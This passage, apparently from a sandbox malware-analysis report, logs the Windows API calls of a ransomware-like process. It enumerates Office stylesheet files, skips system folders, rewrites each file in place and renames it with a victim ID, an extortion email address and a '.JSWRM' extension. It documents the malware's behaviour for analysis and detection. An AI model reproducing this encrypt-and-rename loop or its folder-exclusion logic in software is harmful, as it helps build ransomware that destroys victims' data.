Size=0xa0) returned 0x23d9c8 [0117.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0117.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0117.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0117.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0117.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0117.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0117.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0117.736] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME36.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme36.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME36.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme36.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0117.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0117.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0117.738] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x205bc, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME37.CSS", cAlternateFileName="")) returned 1 [0117.738] lstrcmpiW (lpString1="SCHEME37.CSS", lpString2=".") returned 1 [0117.738] lstrcmpiW (lpString1="SCHEME37.CSS", lpString2="..") returned 1 [0117.738] lstrcmpiW (lpString1="SCHEME37.CSS", lpString2="...") returned 1 [0117.738] lstrcmpiW (lpString1="SCHEME37.CSS", lpString2="windows") returned -1 [0117.738] lstrcmpiW (lpString1="SCHEME37.CSS", lpString2="recovery") returned 1 [0117.738] lstrcmpiW (lpString1="SCHEME37.CSS", lpString2="perflogs") returned 1 [0117.738] lstrcmpiW (lpString1="SCHEME37.CSS", lpString2="documents and settings") returned 1 [0117.738] lstrcmpiW (lpString1="SCHEME37.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.738] lstrcmpiW (lpString1="SCHEME37.CSS", lpString2="system volume information") returned -1 [0117.738] lstrcmpiW (lpString1="SCHEME37.CSS", lpString2="msocache") returned 1 [0117.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0117.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME37.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME37.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME37.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0117.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0117.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME37.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME37.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME37.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0117.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0117.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0117.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0117.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME37.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme37.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.745] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=132540) returned 1 [0117.745] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x205b0) returned 0x24c1d0 [0117.745] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x205b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x205b0, lpOverlapped=0x0) returned 1 [0117.771] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.771] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x205b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x205b0, lpOverlapped=0x0) returned 1 [0117.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.772] CloseHandle (hObject=0x314) returned 1 [0117.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0117.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0117.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0117.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0117.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0117.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0117.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.772] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME37.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme37.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME37.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme37.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0117.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0117.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0117.774] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaccc88d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaccc88d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f07c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME38.CSS", cAlternateFileName="")) returned 1 [0117.774] lstrcmpiW (lpString1="SCHEME38.CSS", lpString2=".") returned 1 [0117.774] lstrcmpiW (lpString1="SCHEME38.CSS", lpString2="..") returned 1 [0117.774] lstrcmpiW (lpString1="SCHEME38.CSS", lpString2="...") returned 1 [0117.774] lstrcmpiW (lpString1="SCHEME38.CSS", lpString2="windows") returned -1 [0117.774] lstrcmpiW (lpString1="SCHEME38.CSS", lpString2="recovery") returned 1 [0117.774] lstrcmpiW (lpString1="SCHEME38.CSS", lpString2="perflogs") returned 1 [0117.774] lstrcmpiW (lpString1="SCHEME38.CSS", lpString2="documents and settings") returned 1 [0117.774] lstrcmpiW (lpString1="SCHEME38.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.774] lstrcmpiW (lpString1="SCHEME38.CSS", lpString2="system volume information") returned -1 [0117.774] lstrcmpiW (lpString1="SCHEME38.CSS", lpString2="msocache") returned 1 [0117.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0117.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME38.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME38.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME38.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0117.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0117.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME38.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME38.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME38.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0117.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0117.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0117.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0117.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME38.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme38.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.776] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=127100) returned 1 [0117.776] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f070) returned 0x24c1d0 [0117.776] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f070, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f070, lpOverlapped=0x0) returned 1 [0117.787] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.787] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f070, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f070, lpOverlapped=0x0) returned 1 [0117.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.788] CloseHandle (hObject=0x314) returned 1 [0117.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0117.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0117.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0117.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0117.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0117.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0117.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0117.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0117.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.788] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME38.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme38.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME38.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme38.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0117.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0117.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0117.789] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaccc88d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaccc88d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaccc88d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e44c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME39.CSS", cAlternateFileName="")) returned 1 [0117.789] lstrcmpiW (lpString1="SCHEME39.CSS", lpString2=".") returned 1 [0117.789] lstrcmpiW (lpString1="SCHEME39.CSS", lpString2="..") returned 1 [0117.789] lstrcmpiW (lpString1="SCHEME39.CSS", lpString2="...") returned 1 [0117.789] lstrcmpiW (lpString1="SCHEME39.CSS", lpString2="windows") returned -1 [0117.789] lstrcmpiW (lpString1="SCHEME39.CSS", lpString2="recovery") returned 1 [0117.789] lstrcmpiW (lpString1="SCHEME39.CSS", lpString2="perflogs") returned 1 [0117.789] lstrcmpiW (lpString1="SCHEME39.CSS", lpString2="documents and settings") returned 1 [0117.789] lstrcmpiW (lpString1="SCHEME39.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.789] lstrcmpiW (lpString1="SCHEME39.CSS", lpString2="system volume information") returned -1 [0117.789] lstrcmpiW (lpString1="SCHEME39.CSS", lpString2="msocache") returned 1 [0117.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0117.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME39.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME39.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME39.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0117.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0117.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME39.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME39.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME39.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0117.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0117.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0117.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0117.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME39.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme39.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.909] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=123980) returned 1 [0117.910] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e440) returned 0x24c1d0 [0117.910] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e440, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1e440, lpOverlapped=0x0) returned 1 [0117.941] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.941] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e440, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1e440, lpOverlapped=0x0) returned 1 [0117.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.941] CloseHandle (hObject=0x314) returned 1 [0117.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0117.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0117.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0117.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0117.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0117.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0117.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0117.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0117.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0117.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0117.942] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 